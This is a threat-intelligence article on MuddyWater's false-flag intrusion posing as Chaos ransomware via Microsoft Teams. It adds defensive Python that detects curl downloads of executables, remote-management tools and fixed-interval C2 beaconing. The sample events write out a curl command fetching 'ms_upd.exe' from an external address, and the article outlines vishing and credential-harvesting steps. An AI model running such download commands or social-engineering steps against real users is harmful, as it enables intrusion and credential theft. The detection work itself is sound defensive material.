MuddyWater APT Camouflages Attacks as Chaos Ransomware, Exploits Microsoft Teams
The Iranian state-sponsored hacking group **MuddyWater** is disguising its operations as ransomware attacks, leveraging **Microsoft Teams** for initial access. This "false flag" campaign uses social engineering and readily available cybercrime tools to obfuscate attribution and achieve strategic objectives.

**MuddyWater** (also known as Mango Sandstorm, Seedworm, and Static Kitten) has been linked to a recent ransomware attack designed as a "false flag" operation. The group is known for its sophisticated campaigns targeting various sectors.
### Social Engineering via Microsoft Teams
Observed by **Rapid7** in early 2026, the attack leverages social engineering techniques through **Microsoft Teams** to initiate the infection. While initially appearing to be the work of the **Chaos** ransomware-as-a-service (RaaS) group, evidence suggests a targeted, state-backed operation masquerading as opportunistic extortion.
"The campaign was characterized by a high-touch social engineering phase conducted via **Microsoft Teams**, where the attackers utilized interactive screen-sharing to harvest credentials and manipulate multi-factor authentication (MFA)," **Rapid7** stated in their report.
Instead of traditional file encryption, the group focused on data exfiltration and establishing long-term persistence using remote management tools like DWAgent.
### Blurring the Lines: Off-the-Shelf Tools
**MuddyWater** is increasingly employing readily available tools from the cybercrime underground to complicate attribution efforts. This trend has been noted by **Ctrl-Alt-Intel**, **Broadcom**, **Check Point**, and **JUMPSEC**, highlighting the group's use of CastleRAT and Tsundere.
### MuddyWater's History with Ransomware
This isn't the first time **MuddyWater** has engaged in ransomware attacks. In September 2020, they were linked to a campaign targeting Israeli organizations using a loader called PowGoop, which deployed a **Thanos** ransomware variant. In 2023, **Microsoft** revealed the group collaborated with DEV-1084 (known for using the DarkBit persona) to conduct destructive attacks under the guise of ransomware deployment. As recently as October 2025, the attackers are believed to have used the **Qilin** ransomware to target an Israeli government hospital.
### The Chaos RaaS Connection
"In this case, the emerging picture was that the attackers were likely Iranian-affiliated operators working through the cyber criminal ecosystem, using a criminal ransomware brand and methods associated with the broader extortion market, while serving a strategic Iranian objective," **Check Point** noted.
**Chaos**, a RaaS group that emerged in early 2025, is known for its double extortion model and advertises its affiliate program on cybercrime forums. Attacks by **Chaos** involve mail flooding and vishing using **Teams**, often impersonating IT support to trick victims into installing remote access tools like **Microsoft Quick Assist**.
**Rapid7** also noted that **Chaos** has demonstrated triple extortion by threatening distributed denial-of-service (DDoS) attacks and quadruple extortion by threatening to contact customers or competitors.

As of late March 2026, **Chaos** has claimed 36 victims on its data leak site, primarily in the U.S., targeting sectors such as construction, manufacturing, and business services.
### Attack Methodology
The intrusion analyzed by **Rapid7** showed the threat actor initiating external chat requests via **Teams** to engage employees and gain initial access through screen-sharing. They then used compromised accounts for reconnaissance, established persistence with tools like DWAgent and AnyDesk, moved laterally, and exfiltrated data before contacting the victim for ransom negotiations.
"While connected, the TA [threat actor] executed basic discovery commands, accessed files related to the victim's VPN configuration, and instructed users to enter their credentials into locally created text files," **Rapid7** explained. "In at least one instance, the TA also deployed a remote management tool (AnyDesk) to further facilitate access."
The threat actor also used RDP to download an executable ("ms_upd.exe") from an external server using the curl utility, initiating a multi-stage infection chain.
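Two of the host-level behaviours described above (curl fetching an executable from an external server, and remote-management tooling such as AnyDesk or DWAgent appearing on a workstation) are straightforward to triage from process-creation telemetry. The following is an added detection example, not code from the Rapid7 report or from the attackers' tooling; the event format, the remote-tool list, the internal-domain allow-list and the sample events are all constructed for illustration.

```python
"""Triage constructed process-creation events for two behaviours from the
write-up: curl downloading a .exe from a non-internal host, and the launch of
remote-management tools. Event shape and samples are constructed, not real."""
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Hypothetical: remote-management binaries whose first appearance on a host
# deserves an alert; tune to the tools your environment actually approves.
REMOTE_TOOLS = {"anydesk.exe", "dwagent.exe", "dwagsvc.exe", "quickassist.exe"}
# Hypothetical: internal download sources that should not raise an alert.
INTERNAL_SUFFIXES = (".corp.example",)


@dataclass
class ProcEvent:
    host: str
    user: str
    image: str      # full path of the created process image
    cmdline: str    # command line as logged by the endpoint sensor


def _basename(path: str) -> str:
    """Normalise a Windows or POSIX path to its lower-cased file name."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def curl_exe_download(ev: ProcEvent):
    """Return the offending URL when curl fetches a .exe from a non-internal host."""
    if _basename(ev.image) != "curl.exe":
        return None
    for url in re.findall(r"https?://\S+", ev.cmdline):
        parsed = urlparse(url)
        host = parsed.hostname or ""
        if parsed.path.lower().endswith(".exe") and not host.endswith(INTERNAL_SUFFIXES):
            return url
    return None


def remote_tool_launch(ev: ProcEvent):
    """Return the tool name when a known remote-management binary starts."""
    name = _basename(ev.image)
    return name if name in REMOTE_TOOLS else None


def triage(events):
    """Return (host, finding_type, detail) tuples for every matching event."""
    findings = []
    for ev in events:
        url = curl_exe_download(ev)
        if url:
            findings.append((ev.host, "curl_exe_download", url))
        tool = remote_tool_launch(ev)
        if tool:
            findings.append((ev.host, "remote_tool", tool))
    return findings


# Constructed sample events (203.0.113.0/24 is a documentation range).
SAMPLE_EVENTS = [
    ProcEvent("WS01", "jdoe", r"C:\Windows\System32\curl.exe",
              r"curl.exe -o C:\Users\jdoe\Downloads\ms_upd.exe http://203.0.113.10/ms_upd.exe"),
    ProcEvent("WS01", "jdoe", r"C:\Windows\System32\curl.exe",
              "curl.exe -O http://files.corp.example/report.pdf"),
    ProcEvent("WS01", "jdoe", r"C:\Users\jdoe\Downloads\AnyDesk.exe", "AnyDesk.exe"),
    ProcEvent("WS02", "asmith", r"C:\Windows\System32\notepad.exe", "notepad.exe notes.txt"),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Run against the constructed events, the curl fetch of `ms_upd.exe` from the external address and the AnyDesk launch are reported, while the internal PDF download and the editor start are ignored. In production the same two checks map onto Sysmon Event ID 1 or EDR process-start events, and the allow-list of internal hosts is what keeps legitimate software distribution from paging anyone.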
### Malware Analysis
Key malware components include:
* `ms_upd.exe` (aka Stagecomp): Collects system information and connects to a command-and-control (C2) server to drop next-stage payloads.
* `game.exe` (aka Darkcomp): A bespoke remote access trojan (RAT) masquerading as a legitimate **Microsoft WebView2** application. It is a trojanized version of the official **Microsoft** WebView2APISample project.
* `WebView2Loader.dll`: A legitimate DLL required by **Microsoft Edge WebView2**.
* `visualwincomp.txt`: An encrypted configuration used by the RAT to obtain the C2 information.
The RAT connects to the C2 server and polls for new commands every 60 seconds, allowing it to run commands and PowerShell scripts, perform file operations, and spawn an interactive cmd.exe or PowerShell shell.
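A fixed 60-second polling cadence is exactly the kind of regularity that stands out in outbound connection logs once traffic is grouped per source and destination. The following is an added example of that beaconing check, written for this page and not taken from the Rapid7 analysis; the log line format, thresholds, IP addresses and timestamps are constructed.

```python
"""Flag (source, destination) pairs whose outbound connections recur at a
near-constant interval, the check-in pattern described for the RAT.
Log format and sample records are constructed for this example."""
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import median, pstdev


def load(lines):
    """Parse constructed records of the form '<ISO timestamp> <src> <dst:port>'."""
    conns = defaultdict(list)
    for line in lines:
        ts, src, dst = line.split()
        conns[(src, dst)].append(datetime.fromisoformat(ts))
    return conns


def beacon_score(times, min_samples=8):
    """Return (median gap in seconds, relative jitter) or None if too few samples."""
    if len(times) < min_samples:
        return None
    times = sorted(times)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    med = median(gaps)
    jitter = pstdev(gaps) / med if med else float("inf")
    return med, jitter


def find_beacons(lines, max_jitter=0.1, min_samples=8):
    """Return (src, dst, median_gap, jitter) for pairs that look like polling."""
    hits = []
    for (src, dst), times in load(lines).items():
        score = beacon_score(times, min_samples)
        if score and score[1] <= max_jitter:
            hits.append((src, dst, round(score[0]), round(score[1], 3)))
    return sorted(hits)


# Constructed sample traffic (198.51.100.0/24 and 192.0.2.0/24 are documentation ranges).
_BASE = datetime(2026, 3, 2, 10, 0, 0)
_JITTER = [0, 1, 1, 0, 0, 1, 1, 0, 0, 1]          # a second or so of drift per check-in
_beacon = [(_BASE + timedelta(seconds=60 * i + j)).isoformat() + " WS01 198.51.100.7:443"
           for i, j in enumerate(_JITTER)]
_gaps = [5, 120, 3, 900, 30, 7, 400, 15, 60]       # irregular, user-driven browsing
_browse, _t = [], _BASE
for _g in [0] + _gaps:
    _t += timedelta(seconds=_g)
    _browse.append(_t.isoformat() + " WS02 192.0.2.55:443")
_sparse = [(_BASE + timedelta(seconds=60 * i)).isoformat() + " WS03 198.51.100.9:443"
           for i in range(3)]                      # too few samples to judge
SAMPLE_LINES = _beacon + _browse + _sparse

if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LINES):
        print(hit)
```

On the constructed data only the WS01 pair is reported, with a median gap of 60 seconds; the browsing host fails the jitter threshold and the three-connection host is skipped for lack of samples. Real malware often randomises its sleep, so the jitter threshold and minimum sample count are the knobs to tune against your own baseline rather than fixed values.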
### Attribution to MuddyWater
The campaign's links to **MuddyWater** are supported by the use of a code-signing certificate attributed to "Donald Gay" to sign "ms_upd.exe." This certificate has been previously used by the threat cluster to sign its malware, including a CastleLoader downloader called Fakeset.
